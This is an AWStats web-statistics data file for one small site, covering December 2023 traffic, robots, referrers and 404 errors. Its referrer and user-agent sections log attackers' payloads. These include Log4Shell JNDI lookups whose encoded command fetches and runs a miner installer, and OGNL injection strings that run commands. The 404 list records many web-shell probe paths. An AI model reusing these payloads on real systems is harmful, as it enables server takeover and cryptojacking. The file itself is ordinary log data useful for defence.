AWSTATS DATA FILE 7.8 (build 20200416)
# If you remove this file, all statistics for date 202312 will be lost/reset.
# Last config file used to build this data file was /home/z1h9uk8mq9i3/tmp/awstats/awstats.proditelsas.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2016                
POS_TIME 2694                
POS_VISITOR 52877               
POS_DAY 76381               
POS_DOMAIN 3571                
POS_LOGIN 4360                
POS_ROBOT 4515                
POS_WORMS 5372                
POS_EMAILSENDER 5503                
POS_EMAILRECEIVER 5646                
POS_SESSION 77245               
POS_SIDER 77454               
POS_FILETYPES 5781                
POS_DOWNLOADS 6105                
POS_OS 6337                
POS_BROWSER 6760                
POS_SCREENSIZE 10075               
POS_UNKNOWNREFERER 10149               
POS_UNKNOWNREFERERBROWSER 12084               
POS_ORIGIN 13456               
POS_SEREFERRALS 13601               
POS_PAGEREFS 13855               
POS_SEARCHWORDS 19186               
POS_KEYWORDS 19338               
POS_MISC 2358                
POS_ERRORS 19397               
POS_CLUSTER 4216                
POS_SIDER_404 19545               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20240101005052 55 11861 4390261023153
FirstTime 20231201000846
LastTime 20231231183929
LastUpdate 20240101050537 55 0 54 0 0
TotalVisits 801                 
TotalUnique 595                 
MonthHostsKnown 0                   
MonthHostsUnknown 618                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
DirectorSupport 0 0 0
PDFSupport 0 0 0
JavaEnabled 0 0 0
RealPlayerSupport 0 0 0
FlashSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
JavascriptDisabled 0 0 0
TotalMisc 0 0 0
AddToFavourites 0 4 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 42 46 331076 50 96 224833
1 31 35 91816 312 344 391311
2 57 71 4865279 44 91 398450
3 36 36 112632 69 100 510077
4 37 39 109000 50 76 104863
5 65 93 4723676 92 120 673693
6 67 143 15785103 64 126 549151
7 74 117 7126589 731 786 597885
8 136 307 55959621 212 264 269379
9 84 168 13912051 107 141 214848
10 48 104 9267944 56 79 329740
11 97 200 20173422 65 101 287129
12 74 131 9299355 68 107 246067
13 87 157 7664437 165 208 849539
14 48 64 2454921 68 126 763939
15 50 106 9254257 105 169 1450366
16 99 113 889475 50 87 159924
17 61 104 12578988 409 461 626137
18 35 64 11539674 85 112 137916
19 54 129 7746658 342 385 560161
20 49 58 343669 36 70 574513
21 129 321 12497612 89 125 187401
22 28 28 130257 51 95 381792
23 42 56 2515276 63 107 355563
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 39
us 522 657 50518193
co 392 1183 118187019
jp 101 115 2429248
cn 92 102 498737
gb 55 72 120627
ru 54 54 88746
fr 31 31 198912
ua 28 28 311545
lb 23 23 26367
ar 21 87 9864318
be 20 20 16180
se 19 19 151875
in 19 23 160844
nl 17 17 110892
ro 17 17 105505
es 17 17 17465
ca 15 17 27830
it 13 13 100823
sc 12 12 32988
md 7 7 83118
de 6 6 14017
eu 6 6 30702
il 5 5 4045
bo 5 61 9131944
ao 4 4 10996
at 3 3 40786
br 3 31 4568104
bg 1 1 17038
al 2 2 28912
cr 2 2 5498
ee 3 3 9414
th 1 1 3072
au 3 3 5882
ch 1 1 4264
hk 1 1 4264
cz 3 3 28012
pa 1 10 7841352
pe 2 30 4563840
za 3 3 9414
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 19
Googlebot/ 771 6051725 20231231223156 0
bingbot/ 109 1915742 20231231230421 0
AhrefsBot/ 88 716168 20231231162241 0
Go\-http\-client/ 19 44867 20231231111057 0
MJ12bot/ 17 55147 20231228014231 0
bot[\s_+:,\.\;\/\\-] 16 58667 20231229172436 0
SemrushBot/ 14 56821 20231230193603 0
no_user_agent 14 238532 20231228233701 0
curl 7 6948 20231227050800 0
(firefox/)([0-9]\.|[0-1][0]\.) 6 4045 20231228041533 0
Applebot/ 6 814946 20231208152224 0
unknown 6 4854 20231230134533 6
Googlebot\-Image/ 4 0 20231230154751 0
nbot 2 38458 20231212140120 0
Python\-urllib/ 2 3474 20231223035916 0
DuckDuckGo\-Favicons\-Bot/ 2 8528 20231228015241 0
BLEXBot/ 1 4264 20231204035845 0
crawl 1 809 20231212025933 0
fetcher 1 0 20231228141714 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 14
html 305 1658661 0 0
queue 1 1465 0 0
js 367 4123096 0 0
note 1 36 0 0
php 1114 3063936 0 0
xml 6 4854 0 0
Unknown 94 148029 0 0
staff 6 216 0 0
woff 3 130716 0 0
pdf 1 196301 0 0
css 221 443126 0 0
jpg 340 120682038 0 0
png 188 78900099 0 0
gif 43 20215 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 6
/disponibilidad.pdf 5 0 947703
/Decreto%201524%20de%202002.pdf 2 0 587854
/ficha%20tecnica.pdf 2 0 915009
/atencion.pdf 2 0 370538
/Decreto%20067.pdf 1 0 6824
/contrato.pdf 1 0 399476
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 25
macosx15 145 53
winnt 2 1
ios_ipad 1 1
win10 1332 721
androidpie 2 2
macosx13 16 2
macosx14 6 6
android 101 30
winlong 7 7
macosx8 4 4
win7 57 53
ios_iphone 210 108
macosx 78 71
android10 232 27
bsdopenbsd 1 1
androidoreo 8 2
linux 94 91
macosx10 18 4
Unknown 300 270
linuxubuntu 27 27
win8 7 7
macosx7 21 21
winxp 10 10
androidmarshmallow 1 1
win8.1 10 10
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 157
chrome92.0.4515.159 18 18
chrome57.0.3042.104 1 1
msie6.0 1 1
chrome104.0.1284 1 1
chrome67.0.166 1 1
chrome75.0.3770.100 6 6
chrome66.0.3359.181 3 3
edge13 9 9
chrome36.0.1985.67 1 1
chrome107.0.0.0 1 1
mozilla 120 106
chrome62.0.3202.94 1 1
chrome37.0.2062.124 1 1
chrome59.0.1335 1 1
safari16.3 1 1
chrome117.0.0.0 1 1
chrome62.0.3202.9 2 2
chrome76.0.3809.100 3 3
chrome71.0.2623.112 2 2
safari17.0 1 1
opera54.0.2952.64 3 3
chrome80.0.3987.162 1 1
chrome70.0.3538.102 1 1
iphone 1 1
chrome58.0.3029.110 1 1
chrome87.0.4280.88 13 2
chrome99.0.4844.88 16 2
chrome67.0.1308 1 0
chrome44.0.2403.89 1 1
chrome65.0.3152.119 1 1
opera95.0.0.0 3 3
chrome103.0.5060.134 30 16
chrome103.0.5060.71 1 1
chrome77.0.159 1 1
chrome119.0.6045.193 15 1
firefox111.0 1 1
safari5.1 1 1
chrome91.0.4472.114 20 8
chrome87.0.4280.141 16 2
chrome44.0.2403.157 2 2
chrome118.0.0.0 1 1
chrome54.0.2866.71 4 4
chrome108.0.0.0 79 79
chrome80.0.3987.149 1 1
chrome86.0.628 1 0
chrome83.0.4103.61 5 5
netscape 3 3
chrome52.0.3034.72 1 1
firefox102.0 4 4
chrome60.0.3074.96 1 1
safari13.1.3 1 1
firefox51.8 1 1
chrome62.0.2072 1 0
chrome74.0.3694.0 15 1
chrome60.0.3112.113 47 47
chrome111.0.0.0 1 1
chrome81.0.4044.138 7 7
firefox45.0 1 1
chrome68.0.3440.106 7 7
chrome56.0.3096.95 1 1
chrome120.0.6099.71 1 1
chrome120.0.0.0 423 44
chrome109.0.0.0 4 4
edge44 6 6
chrome119.0.0.0 225 29
chrome242.02.8301.120 3 3
chrome83.0.4103.97 5 5
safari 21 3
chrome23.0.1271.97 3 3
chrome95.0.4638.69 2 2
chrome26.0.1410.64 1 1
Unknown 105 89
chrome95.0.4638.54 1 1
chrome79.0.3945.88 2 2
chrome99.0.4844.51 1 1
chrome74.0.3729.157 1 1
chrome103.0.5060.66 2 2
chrome103.0.5060.114 10 10
firefox110.0 2 2
chrome76.0.3809.111 1 1
chrome74.0.3729.169 8 8
chrome56.0.962 1 0
chrome36.0.1985.125 1 1
chrome66.0.3359.117 6 6
firefox114.0 45 45
safari17.1.2 73 24
chrome103.0.0.0 25 25
firefox107.0 1 1
chrome102.0.0.0 1 1
chrome49.0.2623.112 12 8
opera54.0.2952.51 3 3
chrome112.0.0.0 8 8
chrome96.0.4664.110 5 5
chrome113.0.0.0 1 1
safari15.4 8 8
chrome114.0.0.0 124 124
chrome41.0.2228.0 1 1
chrome99.0.4896.127 14 14
opera54.0.2952.54 2 2
safari16.2 1 1
opera53.0.2907.68 3 3
chrome55.0.572 1 0
opera69.0.3686.7 2 2
safari17.1 16 6
chrome64.0.2016 1 1
firefox79.0 1 1
chrome93.0.4577.82 2 2
firefox63.0 1 1
chrome37.0.2049.0 1 1
opera106.0.0.0 263 98
msie7.0 4 4
chrome96.0.4664.45 1 1
chrome103.0.2466 1 1
firefox109.0 3 3
chrome84.0.4147.105 2 2
firefox108.0 1 1
firefox49.3 1 1
chrome78.0.820 1 0
chrome57.0.318 1 1
chrome65.0.974 1 1
chrome79.0.3945.130 6 6
firefox115.0 15 15
chrome97.0.4692.71 1 1
chrome116.0.0.0 2 2
opera89.0.4447.51 29 29
chrome106.0.0.0 85 28
msie9.0 2 2
opera94.0.0.0 1 1
chrome103.0.5060.53 5 5
opera105.0.0.0 284 212
chrome17.0.963.56 21 21
opera53.0.2907.99 3 3
chrome79.0.3945.74 3 3
lynx 1 1
firefox103.0 1 1
chrome45.0.2454.85 1 1
chrome71.0.3578.141 1 1
safari13.0.3 76 76
chrome86.0.4240.198 15 1
netscape5.0 75 75
chrome110.0.0.0 6 6
chrome73.0.3683.86 1 1
safari16.0 1 1
chrome115.0.0.0 3 3
safari11.1.2 1 1
chrome58.0.3032.69 1 1
chrome105.0.0.0 3 3
chrome67.0.3396.99 3 3
safari17.1.1 39 4
chrome88.0.4324.190 4 4
firefox112.0 2 2
chrome98.0.4758.80 1 1
chrome85.0.689 1 1
firefox121.0 37 5
chrome56.0.3061.104 1 1
chrome78.0.3904.108 6 6
opera15.0.1147.24 1 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 19
Mozilla/5.0_(compatible;_Dataprovider.com) 20231216194118
Mozilla/5.0_infrawatch/0.1 20231209021955
Mozilla/5.0_(compatible;_Odin;_https://docs.getodin.com/) 20231213225840
Mozilla/5.0 20231220191106
Mozilla_33741328 20231209164602
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//cdn.x4b.lol:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}') 20231225120042
Python/3.11_aiohttp/3.8.4 20231231164949
Lynx/2.9.0dev.5_libwww-FM/2.14_SSL-MM/1.4.1_GNUTLS/3.6.13 20231214100429
'Mozilla/5.0 20231209164628
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20231231093143
Python/3.10_aiohttp/3.9.0 20231230141003
python-requests/2.31.0 20231226090838
Mozilla/5.0_zgrab/0.x 20231222001325
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}') 20231210233458
Mozilla/5.0_(compatible;_InternetMeasurement/1.0;__https://internet-measurement.com/) 20231231183929
python-requests/2.25.1 20231227065123
panscient.com 20231225162642
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers&#39;_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20231231121006
t.me/DeltaApi 20231226095233
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 9
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//cdn.x4b.lol:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}') 20231225120042
Python/3.11_aiohttp/3.8.4 20231231164949
python-requests/2.25.1 20231227065123
panscient.com 20231225162642
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers&#39;_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20231231121006
t.me/DeltaApi 20231226095233
Python/3.10_aiohttp/3.9.0 20231230141003
python-requests/2.31.0 20231226090838
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}') 20231210233458
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 508 558
From1 8 8
From2 72 72
From3 389 389
From4 553 1663
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 6
www_google_de 2 2
www_bing_com 4 4
www_google_es 3 3
www_google_com 60 60
search_yahoo_catchall 2 2
baidu 1 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 98
http://181.225.72.214:8080 110 110
http://181.119.64.134:8080 97 97
http://181.119.64.134:8080/goform/set_LimitClient_cfg 14 14
http://181.225.72.214:8080/goform/set_LimitClient_cfg 13 13
http://181.225.72.214:8080/favicon.ico 7 7
http://181.119.64.134:8080/jquery-3.3.1.min.js 4 4
http://181.119.64.134:8080/is-bin 4 4
http://181.119.64.134:8080/fw6I 4 4
http://181.119.64.134:8080/favicon.ico 4 4
http://181.225.72.214:8080/sitemap.xml 4 4
http://181.225.72.214:8080/robots.txt 4 4
http://181.119.64.134:8080/sitemap.xml 3 3
http://181.119.64.134:8080/mainFrame.htm 3 3
http://181.119.64.134:8080/robots.txt 3 3
http://181.119.64.134:8080 3 3
http://181.119.64.134:8080/login 2 2
http://181.119.64.134:8080/8.bin 2 2
http://181.225.72.214:8080/showLogin.cc 2 2
http://181.119.64.134:8080/e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php 2 2
http://181.225.72.214:8080/login 2 2
http://181.119.64.134:8080/jquery.js 2 2
http://181.119.64.134:8080/wh/glass.php 2 2
http://181.119.64.134:8080/auth.html 2 2
http://181.119.64.134:8080/Gmail/UnityPlayer.txt 2 2
http://181.225.72.214:8080/is-bin 2 2
http://181.225.72.214:8080/PSIA/index 1 1
http://181.225.72.214:8080/3myC 1 1
http://181.225.72.214:8080/phpmyadmin/ 1 1
http://181.225.72.214:8080/wp-content/themes/twentytwentyone/inc/block-css.php 1 1
http://181.225.72.214:8080/Display/chan/IB61I7MYA 1 1
http://181.225.72.214:8080/ttd.exe 1 1
http://181.119.64.134:8080/phpmyadmin/ 1 1
http://181.119.64.134:8080/onvif/device_service 1 1
http://181.119.64.134:8080/script 1 1
http://181.119.64.134:8080/js/NewWindow_2_all.js 1 1
http://181.225.72.214:8080/gv2M 1 1
http://181.225.72.214:8080/js/NewWindow_2_all.js 1 1
http://181.225.72.214:8080/onvif/device_service 1 1
http://181.225.72.214:8080/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cm6dd1rhe9om5kpd5jkgz4o3bowtf1wad.oast.live%22%29%7D/ 1 1
http://181.225.72.214:8080/api/sonicos/auth 1 1
http://181.225.72.214:8080/zMLUH93A 1 1
http://181.225.72.214:8080/HNAP1 1 1
http://181.119.64.134:8080/phpmyadmin/index.php 1 1
http://181.225.72.214:8080/cgi-bin/authLogin.cgi 1 1
http://181.225.72.214:8080/static/historypage.js 1 1
http://181.119.64.134:8080/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ 1 1
http://181.225.72.214:8080/Telerik.Web.UI.WebResource.axd 1 1
http://181.225.72.214:8080/script 1 1
http://181.119.64.134:8080/APxS 1 1
http://181.225.72.214:8080/wh/glass.php 1 1
http://181.119.64.134:8080/api/sonicos/tfa 2 2
http://181.119.64.134:8080/zMLUH93A 2 2
http://181.119.64.134:8080/HNAP1 1 1
https://l.wl.co 2 2
http://181.119.64.134:8080/Display/chan/IB61I7MYA 2 2
http://181.225.72.214:8080/auth.html 1 1
http://181.119.64.134:8080/ttd.exe 2 2
http://181.225.72.214:8080/webfig/ 1 1
http://181.119.64.134:8080/PSIA/index 1 1
http://181.225.72.214:8080/qd.CHM 1 1
http://181.225.72.214:8080/UnityPlayer.dll 1 1
http://181.225.72.214:8080/owa 1 1
http://181.225.72.214:8080/api/session/properties 1 1
http://181.225.72.214:8080/news.php 1 1
http://181.225.72.214:8080/manager/html 1 1
http://181.119.64.134:8080/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cm5pg9jhe9olhm2mqfp01c1me91i6bq8s.oast.pro%22%29%7D/ 1 1
http://181.119.64.134:8080/categories/Yud 2 2
http://181.225.72.214:8080/e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php 1 1
http://181.225.72.214:8080/sslvpnLogin.html 1 1
http://181.119.64.134:8080/qd.CHM 2 2
http://181.119.64.134:8080/api/sonicos/auth 2 2
http://181.225.72.214:8080 2 2
http://181.225.72.214:8080/nation.php 1 1
http://181.225.72.214:8080/jquery.js 1 1
http://181.225.72.214:8080/auth1.html 1 1
http://181.119.64.134:8080/nation.php 2 2
http://181.225.72.214:8080/hrsgdsb7386wknzms.jpg 1 1
http://181.119.64.134:8080/cluster/cluster/ 1 1
http://181.119.64.134:8080/E3lx 1 1
http://181.119.64.134:8080/UnityPlayer.dll 2 2
http://181.225.72.214:8080/categories/Yud 1 1
http://181.119.64.134:8080/showLogin.cc 1 1
http://181.225.72.214:8080/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ 1 1
http://181.225.72.214:8080/api/sonicos/tfa 1 1
http://181.119.64.134:8080/sslvpnLogin.html 2 2
http://181.119.64.134:8080/news.php 2 2
http://181.119.64.134:8080/nOXG 1 1
http://181.225.72.214:8080/8.bin 1 1
http://181.225.72.214:8080/fw6I 2 2
http://181.119.64.134:8080/new/login 2 2
http://181.225.72.214:8080/new/login 1 1
http://181.119.64.134:8080/hrsgdsb7386wknzms.jpg 2 2
http://181.119.64.134:8080/wp-content/themes/twentytwentyone/inc/block-css.php 2 2
http://181.119.64.134:8080/manager/html 1 1
http://181.119.64.134:8080/Hdy7 1 1
http://181.119.64.134:8080/auth1.html 2 2
http://181.225.72.214:8080/Gmail/UnityPlayer.txt 1 1
http://181.225.72.214:8080/jquery-3.3.1.min.js 2 2
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 6
302 210 843
301 7 1702
206 2 2733
404 2583 0
201 15 1219
422 289 810949
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 1181
/img/xmrlpc.php 1 -
/comida/atencion.pdf 1 -
/ajax-actions.php 1 -
/alfanew.php 3 -
/asset-manifest.json 1 http://proditelsas.com/
/wp-content/plugins/seoo/wsoyanz1.php 1 -
/admin/tmp/ 6 -
/wp-admin/js/about.php 1 -
//xxl.php 1 -
/wp-content/plugins/revslider/includes/external/page/index.php 1 -
/link-manager.php 1 -
/wp-content/themes/theme-config.php 1 proditelsas.com
//lock0360.php 1 -
/wp-content/plugins/WordPressCore-1/include.php 1 -
/ms-upgrade-network.php 1 -
//wp-includes/wp_filemanager.php 1 -
/thoms.php 1 -
/wp-admin/images/cloud.php 1 -
/wp-admin/css/colors/xmrlpc.php 1 -
/wp-content/themes/twentyfive/ 6 -
/wp-includes/css/css.php 1 -
//byp.php 1 -
/nav-menus.php 1 -
//olux.php 1 -
/plugins/jquery-file-upload/server/php/ 1 -
/wp-content/themes/seotheme/db.php 1 www.google.com
/home 3 -
/heada.php 1 -
/sitemap1.xml 1 -
/blog/wp-includes/ 6 -
/wp-content/themes/mero-megazines/ws.php 1 -
/media-new.php 1 -
/titulo-de-la-publicacion-en-el-blog/ 1 -
/robots.txt 228 -
//cgi-bin/license.php 1 -
/cgi-bin/ 6 -
//wp-content/languages/themes/class_api.php 1 -
//tmpshell.php 1 -
/wp-the1me.php 1 -
/css/xmrlpc.php 1 -
/jp.php 1 -
/delpaths.php 1 -
//credits.php 1 -
/wp-admin/css/colors/coffee/about.php 3 -
//wp-admin/wso112233.php 1 -
/.well-known/acme-challenge/moon.php 1 www.google.com
/edit-tags.php 1 -
/css/ 6 -
/wp-admin/network/wp-login.php 2 -
/public/scripts/filemanager/dialog.php 1 -
//wp-atom.php 1 -
//theme-install.php 1 -
/wp-content/home.php 1 -
/humans.txt 6 -
//symlink.php 1 -
//Deadcode1975.php 1 -
/wp 3 -
//wp-22.php 1 -
/mycommand.php 1 -
/wp-content/plugins/backup-backup/includes/backup-heart.php 1 -
//me.php 1 -
/wp-content/plugins/press/wp-class.php 3 -
/wp-blog-header.php 1 -
/xxl.php 2 -
/phpzipincs.php 1 -
/wp-includes/pomo/ 6 -
/var/cache/mage--2/ 1 -
/wp-includes/wp-includes/ 6 -
/security.txt 1 -
//hanna1337.php 1 -
/assets/lib/plupload/examples/upload.php 1 -
//wp-content/plugins/core-plugin/include.php 1 -
//wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php 1 -
/cache-compat.php 1 -
/options-reading.php 1 -
/wp-load.php 1 -
/wp-config-sample.php 1 -
//css/install.php 1 -
/.well-knownold/shell20211028.php 1 -
//license.php 1 -
/ms-users.php 1 -
/wp-content/plugins/doyanz/config.php 1 -
/wp-content/wso112233.php 1 -
//plugins.php 1 -
/wp-content/plugins/aryabot/ 6 -
//root.php 1 -
/LA.php 1 -
/.well-known/acme-challenge/cloud.php 2 www.google.com
//class.api.php 1 -
/x.php 3 -
/admin-header.php 1 -
/wp-content/themes/clockstone/style.css 1 -
/blog/ 1 -
/public/painel/js/plupload/examples/upload.php 1 -
/wp-content/uploads/xl2023.php 2 -
//wso112233.php 1 -
//wp-content/plugins/ioptimization/IOptimize.php 1 -
//wp-includes/js/tinymce/plugins/compat3x/css/index.php 1 -
/files/ 15 binance.com
/wordpress 3 -
/wp-admin/maint/about.php 1 -
/wp-content/plugins/envato-market/inc/class-envato-market-api.php 2 www.google.com
//wp-content/themes/finley/min.php 1 -
//wp-content/up.php 1 -
/wp-content/ALFA_DATA/alfacgiapi/ 6 -
//wp-admin/maint/moon.php 1 -
//wp-content/plugins/index.php 1 -
/wp-content/plugins/owfsmac/ 6 -
/wp-content/inputs.php 1 -
/version.php 1 -
/TNT.php 3 -
/backup/ 1 -
/xleet-shell.php 2 -
//wp-admin/network/subjects.php 1 -
/resources/global/plugins/jquery-file-upload/server/php/ 1 -
/feed/ 5 -
//gaza.php 1 -
/.well-known/pkivalidation/bala.php 1 -
/wp-content/uploads/wso112233.php 1 -
/wp-admin/css/colors/modern/ 6 -
//about.php 1 -
/sitemap_index.xml 9 -
/wp-content/cong.php 1 -
/users.php 1 -
/wp-content/dropdown.php 1 -
//wp-content/themes/pridmag/db.php 1 -
/admin/plugins/plupload/examples/upload.php 1 -
//wp-content/plugins/ccx/index.php 1 -
//wp-admin/css/colors/blue/CasperExV1.php 1 -
/app/.env 1 -
/plugin-editor.php 1 -
/cgi-bin/install.php 1 -
//wp-admin/includes/users.php 1 -
//wp-content/plugins/xsid/marijuana.php 1 -
//fx.php 1 -
/wp-includes/images/smilies/ 6 -
/sitemap.txt 5 -
/view-source: 5 -
/reservas/index.php 1 -
/api/.env 1 -
//wp-content/plugins/revslider/includes/external/page/shell.php 1 www.google.com
//wp-admin/js/about.php7 1 -
/wp-content/languages/wp-conflg.php.suspected 1 -
/todo.php 1 -
//wp-content/plugins/fix/up.php 8 -
/user-edit.php 1 -
//wso.php 1 -
//wp.php 1 -
/alfa-rex.php 2 www.google.com
/wp-content/patior/ 1 www.google.com
//wp-content/plugins/hellopress/wp_filemanager.php 2 -
/up/.well-known/ 6 -
/screenshot_1.php 1 -
//wp-content/uploads/typehub/custom/.RxR.php 1 -
//wp-content/shell20211028.php 1 -
/wp-admin/wso112233.php 1 -
/ioxi-rex4.php7 1 -
/wp-content/plugins/backup-backup/admin/css/bmi-plugin.min.css 1 -
//m.php 1 -
/tempfuns.php 1 -
/wp-admin/images/wp-login.php 2 -
/.git/config 1 -
/ebs.php7 1 -
//wp-includes/random_compat/random_bytes_cyclone.php 1 -
/wp-admin/network/upfile.php 1 -
//wp-admin/install.php 1 -
/upfile.php 1 -
/wp-content/plugins/wp-diambar/includes/ 6 -
/wp-content/plugins/royal-elementor-addons/readme.txt 1 -
/wp-content/admin.php 5 -
//images/F0x.php 1 -
/temp/ 1 -
/edit-comments.php 1 -
//wsu.php 1 -
//shells.php 1 -
/assets/libs/jquery-file-upload/server/php/ 1 -
//wpx.php 1 -
//wp-content/home.php 1 -
/xl2023x.php 2 -
/wordpress/wp-admin/includes/wp-admin/js/ 6 -
//common/img/class_api.php 1 -
//wp-admin/wso.php 1 -
/wp-admin/js/widgets/moon.php 1 www.google.com
/wp-include/inputs.php 1 -
/wp-admin/js/ 6 -
//plugin-install.php 1 -
/wp-includes/widgets/ 6 -
/gdftps.php 1 -
/.well-known/acme-challenge/xmrlpc.php 2 www.google.com
//ch.php 1 -
//wp-admin/users.php 1 -
//moto.php 1 -
//wp-content/plugins/revslider/includes/page/index.php 1 -
//common/css/class_api.php 1 -
/worksec.php 1 -
/xleetshell.php 1 -
/wp/ 1 -
//wp-content/plugins/linkpreview/db.php 1 -
//M1.php 1 -
/metronic/assets/global/plugins/jquery-file-upload/server/php/ 1 -
/wp-2022.php 1 -
